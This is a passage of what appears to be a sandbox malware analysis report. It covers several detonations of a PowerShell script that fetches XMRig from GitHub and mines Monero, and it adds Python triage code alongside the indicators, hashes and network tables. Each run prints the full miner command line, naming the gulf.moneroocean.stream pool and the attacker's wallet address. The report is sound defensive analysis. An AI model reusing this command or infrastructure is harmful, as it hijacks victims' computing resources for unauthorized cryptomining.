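    {"type": "network_connect", "pid": 1752, "dhost": "gulf.moneroocean.stream", "dport": 10128},
]

if __name__ == "__main__":
    for pid, t in sorted(score_events(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(t))
```

The wallet check is deliberately shape-only (prefix, length, base58 alphabet); a full Monero address checksum needs Keccak-256, which the standard library does not provide, and the shape test is already a strong signal when it appears as a pool username.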

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 13.107.21.237:443 g.bing.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
GB 184.28.176.104:443 www.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
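The Network table above mixes three things: the sample's own DNS queries, the sandbox's reverse (PTR) lookups of every peer it observed, and the actual TCP contacts. The following added example (not part of the report) parses rows in this flattened "Country Destination Domain Proto" format and buckets them. The rows embedded in it are copied from this run plus one bare-IP row from behavioral28; treating bing.com traffic as VM background noise is an assumption, not something the report states.

```python
"""Added example, not part of the sandbox report: parse flattened
'Country Destination Domain Proto' rows and separate what the sample
contacted from the sandbox's resolver traffic."""
import re
from dataclasses import dataclass
from typing import Optional

RESOLVER = ("8.8.8.8", 53)
PTR = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa$")
BACKGROUND = ("bing.com",)  # assumption: Windows/Edge telemetry on the sandbox VM


@dataclass(frozen=True)
class Row:
    country: str
    ip: str
    port: int
    domain: str
    proto: str


def parse_row(line: str) -> Optional[Row]:
    """One table row; the Domain column may be empty (bare-IP contact).
    The header line fails the port check and is skipped."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        (country, dest, proto), domain = parts, ""
    else:
        return None
    ip, _, port = dest.rpartition(":")
    return Row(country, ip, int(port), domain, proto) if port.isdigit() else None


def ptr_to_ip(name: str) -> Optional[str]:
    """'133.110.199.185.in-addr.arpa' -> '185.199.110.133'."""
    m = PTR.match(name)
    return ".".join(reversed(m.groups())) if m else None


def triage(lines: list) -> dict:
    queries, ptr_ips, contacts = set(), set(), {}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        if (row.ip, row.port) == RESOLVER:
            ip = ptr_to_ip(row.domain)
            if ip:
                ptr_ips.add(ip)          # sandbox resolving a peer it saw
            else:
                queries.add(row.domain)  # a name the guest actually asked for
            continue
        contacts[(row.ip, row.port, row.proto)] = row.domain
    contact_ips = {ip for ip, _, _ in contacts}
    return {
        # anything off 80/443 deserves a look; here it is the stratum pool port
        "non_web": sorted((ip, port, dom) for (ip, port, _), dom in contacts.items()
                          if port not in (80, 443)),
        # HTTPS to names the guest resolved itself, minus platform background
        "sample_web": sorted((ip, port, dom) for (ip, port, _), dom in contacts.items()
                             if port in (80, 443) and dom in queries
                             and not dom.endswith(BACKGROUND)),
        "unattributed": sorted((ip, port) for (ip, port, _), dom in contacts.items() if not dom),
        # peers the sandbox reverse-resolved but never recorded as contacted
        "ptr_only": sorted(ptr_ips - contact_ips - {RESOLVER[0]}),
    }


# Rows copied from the behavioral25 table, plus the bare-IP row from behavioral28.
NETWORK_ROWS = [
    "Country Destination Domain Proto",
    "US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp",
    "US 8.8.8.8:53 github.com udp",
    "GB 20.26.156.215:443 github.com tcp",
    "US 8.8.8.8:53 g.bing.com udp",
    "US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp",
    "US 8.8.8.8:53 objects.githubusercontent.com udp",
    "US 13.107.21.237:443 g.bing.com tcp",
    "US 185.199.110.133:443 objects.githubusercontent.com tcp",
    "US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp",
    "GB 184.28.176.104:443 www.bing.com tcp",
    "US 8.8.8.8:53 gulf.moneroocean.stream udp",
    "DE 149.102.143.109:10128 gulf.moneroocean.stream tcp",
    "US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp",
    "US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp",
    "US 52.111.229.43:443 tcp",
]

if __name__ == "__main__":
    for bucket, items in triage(NETWORK_ROWS).items():
        print(bucket, items)
```

The sample_web bucket is what a responder would block or hunt for first after the pool itself: it is the download path (github.com, then objects.githubusercontent.com on 443) that delivered xmrig.exe, and it is separated from the Bing traffic only by the assumption noted above.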

Files

memory/1568-0-0x00007FFB33193000-0x00007FFB33195000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jizp5bff.0co.ps1 (PowerShell's own AppLocker/WDAC lockdown-mode probe, not a file the sample dropped)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1568-10-0x00000157784D0000-0x00000157784F2000-memory.dmp

memory/1568-11-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-12-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-13-0x00007FFB33193000-0x00007FFB33195000-memory.dmp

memory/1568-14-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-16-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-17-0x000001577A930000-0x000001577A942000-memory.dmp

memory/1568-18-0x00000157600B0000-0x00000157600BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1752-49-0x000001D19B1D0000-0x000001D19B1F0000-memory.dmp

memory/1752-50-0x000001D22EAF0000-0x000001D22EB10000-memory.dmp

memory/1752-51-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-54-0x000001D22F160000-0x000001D22F180000-memory.dmp

memory/1752-53-0x000001D22EF30000-0x000001D22EF50000-memory.dmp

memory/1752-52-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-55-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1568-56-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1752-57-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-58-0x000001D22EF30000-0x000001D22EF50000-memory.dmp

memory/1752-59-0x000001D22F160000-0x000001D22F180000-memory.dmp

memory/1752-{60..118}-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp (59 consecutive dumps of the same region)

Analysis: behavioral28

Detonation Overview

Submitted 2024-07-04 03:15
Reported 2024-07-04 08:25
Platform win11-20240508-en
Max time kernel 1799s
Max time network 1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report exports no description, indicator, process or target for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/4288-0-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

memory/4288-3-0x0000020A373F0000-0x0000020A37412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yajzhg2p.adi.ps1 (PowerShell's own AppLocker/WDAC lockdown-mode probe, not a file the sample dropped)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4288-10-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-11-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-12-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-14-0x0000020A37A10000-0x0000020A37A22000-memory.dmp

memory/4288-15-0x0000020A375A0000-0x0000020A375AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-46-0x0000023F835F0000-0x0000023F83610000-memory.dmp

memory/2440-47-0x0000023F83630000-0x0000023F83650000-memory.dmp

memory/2440-48-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/4288-50-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2440-49-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/4288-51-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

memory/4288-52-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2440-53-0x0000024015AB0000-0x0000024015AD0000-memory.dmp

memory/2440-54-0x0000024015CE0000-0x0000024015D00000-memory.dmp

memory/2440-55-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-56-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-57-0x0000024015AB0000-0x0000024015AD0000-memory.dmp

memory/2440-58-0x0000024015CE0000-0x0000024015D00000-memory.dmp

memory/2440-{59..117}-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp (59 consecutive dumps of the same region)

Analysis: behavioral6

Detonation Overview

Submitted 2024-07-04 03:15
Reported 2024-07-04 07:58
Platform win10-20240404-en
Max time kernel 1794s
Max time network 1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the report exports no description, indicator, process or target for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/164-3-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/164-5-0x0000014AF1550000-0x0000014AF1572000-memory.dmp

memory/164-8-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-10-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-9-0x0000014AF1700000-0x0000014AF1776000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm4byoi4.cky.ps1 (PowerShell's own AppLocker/WDAC lockdown-mode probe, not a file the sample dropped; its content is the single character "1", which is what the digests below hash)

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/164-25-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-48-0x0000014AF16E0000-0x0000014AF16F2000-memory.dmp

memory/164-61-0x0000014AF16C0000-0x0000014AF16CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5000-90-0x0000023AA9700000-0x0000023AA9720000-memory.dmp

memory/5000-91-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/164-92-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-93-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/5000-94-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/164-95-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/5000-{96..156}-0x00007FF773770000-0x00007FF7743A3000-memory.dmp (61 consecutive dumps of the same region)

Analysis: behavioral10

Detonation Overview

Submitted 2024-07-04 03:15
Reported 2024-07-04 08:03
Platform win10-20240611-en
Max time kernel 1799s
Max time network 1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 74.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/2008-2-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

memory/2008-5-0x0000026754AB0000-0x0000026754AD2000-memory.dmp

memory/2008-6-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-10-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-9-0x000002676D1C0000-0x000002676D236000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5p2uyzdb.xsm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2008-26-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-49-0x000002676E350000-0x000002676E362000-memory.dmp

memory/2008-62-0x0000026754B40000-0x0000026754B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Network

N/A

Files

memory/2952-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

memory/2952-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2952-5-0x000000001B880000-0x000000001BB62000-memory.dmp

memory/2952-8-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-9-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-10-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-11-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win11-20240611-en

Max time kernel

1791s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3592-0-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp

memory/3592-1-0x0000025EF7AC0000-0x0000025EF7AE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bzqmcfzo.hrf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3592-10-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-11-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-12-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/3592-14-0x0000025EF7FB0000-0x0000025EF7FC2000-memory.dmp

memory/3592-15-0x0000025EF7E80000-0x0000025EF7E8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
